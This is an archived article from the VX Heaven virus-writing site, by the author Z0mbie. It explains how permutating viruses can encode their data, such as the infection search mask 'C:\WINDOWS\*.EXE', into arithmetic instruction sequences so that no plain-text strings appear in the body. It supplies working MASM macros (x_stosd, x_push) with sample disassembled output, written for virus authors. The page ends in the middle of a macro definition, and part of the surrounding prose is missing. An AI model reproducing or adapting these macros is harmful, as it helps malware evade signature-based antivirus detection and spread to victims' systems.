Maximize
Bookmark

VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

Data encoding in meta viruses

Z0mbie

1
[Back to index] [Comments]

Permutating virus is a virus, rebuilding its body on the assembly instructions level. Instead of metamorphic, permutating virus does not generates new "logic" instructions, but modifies existing. So, there appears a question about using data in such virus.

Because instructions and their lengths are modified, there will be some buffer, where the virus body is located and changed, from copy to copy.

So, there are possible two variants:

The second variant is better, as i think. It has the following features: each virus copy is only some code buffer, w/o data at all; data is divided into parts, and each of them is generated when needed. The only problem is that code, generating this data will use a bit more space than data itself.

Now, lets imagine that we're writing virus under the following condition: virus can contain only code. And we wanna build the following string: "C:\WINDOWS\*.EXE",0.

There are two common ways to do it:

 1.                          2.
 lea     edi, temparea       push    0
 mov     eax, "W\:C"         push    "EXE."
 stosd                       push    "*\SW"
 mov     eax, "ODNI"         push    "ODNI"
 stosd                       push    "W\:C"
 mov     eax, "*\SW"         ; *ESP = data
 stosd                       ...
 mov     eax, "EXE."         add     esp, 20
 stosd
 xor     eax, eax
 stosd
; temparea[] = data

And there is two problems. First, 4-byte parts of this string will be in plain form in the code, which is not good. Second, when there are lots of data it will be hard to write such code yourself.

So, we need macro to xlate data into encrypted code. These macros are shown in the end of this text. The results of their work is below:

 BEFORE

 lea   edi, temparea                  x_push ecx, C:\WINDOWS\*.EXE~
 x_stosd C:\WINDOWS\*.EXE~            nop
                                      x_pop

 AFTER

 BFxxxxxxxx mov   edi,0xxxxxxxx       33C9         xor  ecx,ecx
 33C0       xor   eax,eax             81E900868687 sub  ecx,087868600
 2DBDC5A3A8 sub   eax,0A8A3C5BD       51           push ecx
 AB         stosd                     81F12E3F213D xor  ecx,03D213F2E
 350A741818 xor   eax,01818740A       51           push ecx
 AB         stosd                     81C1290E04E5 add  ecx,0E5040E29
 050E0518DB add   eax,0DB18050E       51           push ecx
 AB         stosd                     81F11E1D1865 xor  ecx,065181D1E
 357916046F xor   eax,06F041679       51           push ecx
 AB         stosd                     81E90614E8F7 sub  ecx,0F7E81406
 2D2ECD0111 sub   eax,01101CD2E       51           push ecx
 AB         stosd                     90           nop
                                      8D642414     lea  esp,[esp][00014]

And here is the macros:

x_stosd_first           macro
                        _eax    = 0
                        xor     eax, eax
                        endm

x_stosd_next            macro   t, x
                        if      t eq 0
                        sub     eax, _eax - x
                        endif
                        if      (t eq 1) or (t eq 3)
                        xor     eax, _eax xor x
                        endif
                        if      t eq 2
                        add     eax, x - _eax
                        endif
                        _eax = x
                        stosd
                        endm

x_stosd                 macro   x
                          x_stosd_first
                          j = 0
                          s = 0
                          t = 0
                          irpc    c, <x>
                            k = "&c"
                            if      k eq "~"
                              k = 0
                            endif
                            j = j + k shl s
                            s = s + 8
                            if s eq 32
                              x_stosd_next t,j
                              t = t + 1
                              if t eq 4
                                t = 0
                              endif
                              j = 0
                              s = 0
                            endif   ; i eq 4
                          endm    ; irpc
                          if s ne 0
                            j = (j + 12345678h shl s) and 0ffffffffh
                            x_stosd_next t,j
                          endif
                        endm    ; x_stosd

x_push_first            macro   r
                        xor     r, r
                        _reg = 0
                        endm

x_push_next             macro   q, r, x
                        if q eq 0
                        sub     r, _reg - x
                        endif
                        if (q eq 1) or (q eq 3)
                        xor     r, _reg xor x
                        endif
                        if q eq 2
                        add     r, x - _reg
                        endif
                        push    r
                        _reg = x
                        endm

x_push                  macro   r, x
                        x_push_first r
                        _xsize = 0
                        l       = 0
                        irpc    c, <x>
                        l       = l + 1
                        endm

                        j = 0
                        s = 0

                        l0 = l
                        if (l0 and 3) ne 0
                        j = j shl 8 + "x"
                        s = s + 8
                        l0 = l0 + 1
                        endif
                        if (l0 and 3) ne 0
                        j = j shl 8 + "y"
                        s = s + 8
                        l0 = l0 + 1
                        endif
                        if (l0 and 3) ne 0
                        j = j shl 8 + "z"
                        s = s + 8
                        l0 = l0 + 1
                        endif

                        q = 0

                        i       = l - 1
                        irpc    c1, <x>
                          t       = 0
                          irpc    c, <x>
                            if t eq i
                              j = j shl 8
                              if "&c" ne "~"
                              j = j + "&c"
                              endif
                              s = s + 8
                              if s eq 32
                                _xsize = _xsize + 4
                                x_push_next q,r,j
                                q = q + 1
                                if q eq 4
                                  q = 0
                                endif
                                s = 0
                                j = 0
                              endif
                              exitm
                            endif
                            t     = t + 1
                          endm l irpc
                          i = i - 1
                        endm ; irpc
                        if s ne 0
                          error
                        endif
                        endm ; x_push

x_pop                   macro
By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! vxheaven.org aka vx.netlux.org
deenesitfrplruua